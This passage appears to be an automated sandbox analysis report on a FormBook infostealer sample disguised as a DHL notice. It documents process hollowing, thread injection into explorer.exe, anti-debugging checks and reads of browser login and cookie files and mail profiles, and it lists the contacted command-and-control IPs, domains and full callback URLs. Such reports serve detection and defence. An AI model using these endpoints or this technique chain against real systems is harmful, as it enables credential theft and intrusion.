Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h] 5_2_045A4496
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F849B mov eax, dword ptr fs:[00000030h] 5_2_044F849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04507D50 mov eax, dword ptr fs:[00000030h] 5_2_04507D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04523D43 mov eax, dword ptr fs:[00000030h] 5_2_04523D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04563540 mov eax, dword ptr fs:[00000030h] 5_2_04563540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04593D40 mov eax, dword ptr fs:[00000030h] 5_2_04593D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h] 5_2_0450C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h] 5_2_0450C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0456A537 mov eax, dword ptr fs:[00000030h] 5_2_0456A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AE539 mov eax, dword ptr fs:[00000030h] 5_2_045AE539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h] 5_2_04514D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h] 5_2_04514D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h] 5_2_04514D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B8D34 mov eax, dword ptr fs:[00000030h] 5_2_045B8D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h] 5_2_044F3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044EAD30 mov eax, dword ptr fs:[00000030h] 5_2_044EAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov ecx, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h] 5_2_04566DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04598DF1 mov eax, dword ptr fs:[00000030h] 5_2_04598DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h] 5_2_044FD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h] 5_2_044FD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h] 5_2_045AFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h] 5_2_045AFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h] 5_2_045AFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h] 5_2_045AFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h] 5_2_044E2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h] 5_2_0451FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h] 5_2_0451FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04512581 mov eax, dword ptr fs:[00000030h] 5_2_04512581
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040CF43 LdrLoadDll, 3_2_0040CF43

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Jump to behavior
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000004.00000000.256717981.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.509870496.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.476512956.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.248850915.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.504678905.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831175 Sample: DHL_Notice_pdf.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 30 www.madliainsalu.com 2->30 32 madliainsalu.com 2->32 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 5 other signatures 2->54 10 DHL_Notice_pdf.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\zkvixbqxp.exe, PE32 10->28 dropped 13 zkvixbqxp.exe 1 10->13         started        process6 signatures7 68 Multi AV Scanner detection for dropped file 13->68 70 Detected unpacking (changes PE section rights) 13->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->72 74 Maps a DLL or memory area into another process 13->74 16 zkvixbqxp.exe 13->16         started        19 conhost.exe 13->19         started        process8 signatures9 40 Modifies the context of a thread in another process (thread injection) 16->40 42 Maps a DLL or memory area into another process 16->42 44 Sample uses process hollowing technique 16->44 46 Queues an APC in another process (thread injection) 16->46 21 explorer.exe 3 6 16->21 injected process10 dnsIp11 34 bohndigitaltech.com 162.241.24.110, 49708, 49709, 49710 UNIFIEDLAYER-AS-1US United States 21->34 36 kunimi.org 219.94.129.181, 49702, 49703, 49704 SAKURA-CSAKURAInternetIncJP Japan 21->36 38 11 other IPs or domains 21->38 56 System process connects to network (likely due to code injection or exploit) 21->56 58 Performs DNS queries to domains with low reputation 21->58 25 cmmon32.exe 13 21->25         started        signatures12 process13 signatures14 60 Tries to steal Mail credentials (via file / registry access) 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.46.160.97
 www.0dhy.xyz United States
36352 AS-COLOCROSSINGUS true
67.222.24.48
 rifleroofers.com United States
63410 PRIVATESYSTEMSUS true
49.212.180.95
 denko-kosan.com Japan 9371 SAKURA-CSAKURAInternetIncJP true
1.13.186.125
 www.yongleproducts.com China
13335 CLOUDFLARENETUS true
162.241.24.110
 bohndigitaltech.com United States
46606 UNIFIEDLAYER-AS-1US true
219.94.129.181
 kunimi.org Japan 9371 SAKURA-CSAKURAInternetIncJP true
162.0.231.77
 www.traindic.top Canada
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
kunimi.org 219.94.129.181 true
bohndigitaltech.com 162.241.24.110 true
www.0dhy.xyz 198.46.160.97 true
rifleroofers.com 67.222.24.48 true
www.yongleproducts.com 1.13.186.125 true
www.traindic.top 162.0.231.77 true
madliainsalu.com 34.120.137.41 true
denko-kosan.com 49.212.180.95 true
windowsupdatebg.s.llnwi.net 95.140.230.128 true
www.bohndigitaltech.com unknown unknown
www.madliainsalu.com unknown unknown
www.denko-kosan.com unknown unknown
www.rifleroofers.com unknown unknown
www.kunimi.org unknown unknown
www.amirah.cfd unknown unknown
www.bisarropainting.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== true
  • Avira URL Cloud: malware
 unknown
http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X true
  • Avira URL Cloud: malware
 unknown
http://www.0dhy.xyz/hpb7/ true
  • Avira URL Cloud: malware
 unknown
http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== true
  • Avira URL Cloud: safe
 unknown
http://www.kunimi.org/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.traindic.top/hpb7/ true
  • Avira URL Cloud: malware
 unknown
http://www.bohndigitaltech.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== true
  • Avira URL Cloud: safe
 unknown
http://www.denko-kosan.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X true
  • Avira URL Cloud: malware
 unknown
http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X true
  • Avira URL Cloud: safe
 unknown
http://www.rifleroofers.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== true
  • Avira URL Cloud: safe
 unknown